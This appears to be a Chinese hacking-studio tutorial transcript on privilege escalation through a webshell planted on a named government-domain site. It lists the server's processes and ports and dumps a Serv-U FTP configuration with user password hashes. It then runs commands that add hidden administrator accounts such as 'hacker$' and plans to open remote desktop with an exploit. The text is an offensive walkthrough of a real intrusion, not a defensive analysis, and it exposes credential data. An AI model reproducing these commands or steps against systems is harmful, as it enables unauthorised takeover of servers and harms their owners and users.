╭──────────────────────────╮ 猫客工作室--真诚、高效、创新,敢想敢做努力做到最好! ╰──────────────────────────╯ >讲师名称:剑眉大侠(QQ767501681) >动画名称:实战提权学员(骇梦)给的shell http://www.zzzydj.gov.cn/admin/xinxi/upload/images/ee.asp 0360安全中心 _Copy Del Move Down 0360杀毒 _Copy Del Move Down 0Macromedia _Copy Del Move Down 0Microsoft SQL Server _Copy Del Move Down 0Microsoft Visual Studio .NET 2003 _Copy Del Move Down 0NetMeter _Copy Del Move Down 0Serv-U _Copy Del Move Down 0WinRAR _Copy Del Move Down 0WinWebMail Server _Copy Del Move Down 0启动 _Copy Del Move Down 0管理工具 _Copy Del Move Down 0附件 _Copy Del Move Down Serv-U Microsoft Windows [版本 5.2.3790] 修补程序: 安装了 294 个修补程序。 218.28.135.9:8037 3389端口没开。 360在运行中, 360rp.exe 312 360rp ZhuDongFangYu.exe 1832 ZhuDongFangYu ServUDaemon.exe 1228 Serv-U TCP 0.0.0.0:60000 0.0.0.0:0 LISTENING 1228 TCP 0.0.0.0:65500 0.0.0.0:0 LISTENING 1228 Serv-u路径:D:\Program Files\RhinoSoft.com\Serv-U\ 127.0.0.1:43958.......开放 127.0.0.1:21.......开放 先尝试exp提权 C:\WINDOWS\Temp\Cookies 应该是骇梦传的, Administartor ASPNET IUSR_金博电子 IWAM_金博电子 JinBo syoo 命令成功完成。 cmd /c net user jianmei daxia.asd/add & net localgroup administrators jianmei /add 两种可能性 第一 帐号密码修改了 不是默认 [GLOBAL] Version=6.4.0.6 RegistrationKey=9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI ProcessID=1228 [Domain1] User1=yuncb|1|0 [USER=yuncb|1] Password=qs0B72F2DDDD2F3FDFBDB5FD1967DBCD7C HomeDir=d:\ RelPaths=1 PasswordLastChange=1381394948 TimeOut=600 Maintenance=System Access1=D:\|RWAMLCDP [Domain2] User1=go|1|0 [USER=go|2] Password=ix463278F98DA6F67A8C5E298A9DC50935 HomeDir=c:\ RelPaths=1 PasswordLastChange=1388486558 TimeOut=600 Maintenance=System Access1=c:\|RWAMELCDP [Domain3] User1=hacker|1|0 [USER=hacker|3] Password=ve3BB735A3990260907C641C76DDBBE591 HomeDir=C:\ RelPaths=1 PasswordLastChange=1394868089 TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP [DOMAINS] Domain1=0.0.0.0||21|QQ44997|3|0|0 Domain2=0.0.0.0||60000|Myftp|2|0|0 Domain3=16.18.191.2||21|zydj|1|0|0 Domain4=0.0.0.0||65500|goldsun|4|0|0 [Domain4] User1=go|1|0 [USER=go|4] Password=zdE6FF453A7A806AD3E71F636EBBAB51A0 HomeDir=c:\ RelPaths=1 PasswordLastChange=1394872899 TimeOut=600 Maintenance=System Access1=c:\|RWAMELCDP 第二 端口改了 Wed 12Mar14 15:22:11 - Serv-U FTP Server v6.4 (6.4.0.6) - Copyright (c) 1995-2008 Rhino Software, Inc., All Rights Reserved Wed 12Mar14 15:22:11 - Build Date: 2008年1月2日 10:08 Wed 12Mar14 15:22:12 - Using WinSock 2.0 - max. 32767 sockets Wed 12Mar14 15:22:17 - Loaded SSL/TLS libraries Wed 12Mar14 15:22:17 - FTP Server listening on port number 60000, IP 16.18.191.2, 127.0.0.1 Wed 12Mar14 15:22:17 - FTP Server listening on port number 43958, IP 127.0.0.1 Wed 12Mar14 15:22:17 - FTP Server listening on port number 21, IP 16.18.191.2 Wed 12Mar14 15:22:17 - Valid registration key found Sat 15Mar14 15:21:29 - FTP Server stopped listening on port number 21, IP 16.18.191.2 Sat 15Mar14 15:21:29 - FTP Server listening on port number 21, IP 16.18.191.2, 127.0.0.1 Sat 15Mar14 15:21:29 - FTP Server listening on port number 21, IP 16.18.191.2 (piggyback on existing 0.0.0.0 socket) Sat 15Mar14 15:36:14 - FTP Server listening on port number 65500, IP 16.18.191.2, 127.0.0.1 cmd /c net user hacker$ hacker /add & net localgroup administrators hacker$ /add 用默认试试 隐藏用户hacker$ 密码 hacker 别名 administrators 注释 管理员对计算机/域有不受限制的完全访问权 成员 ------------------------------------------------------------------------------- Administartor ASPNET hacker$ IUSR_金博电子 syoo 命令成功完成。 搞定。 hacker$ 想办法在CMD那里找可执行目录,用EXP去执行开3389的exe。 在这里不演示了,教程结束。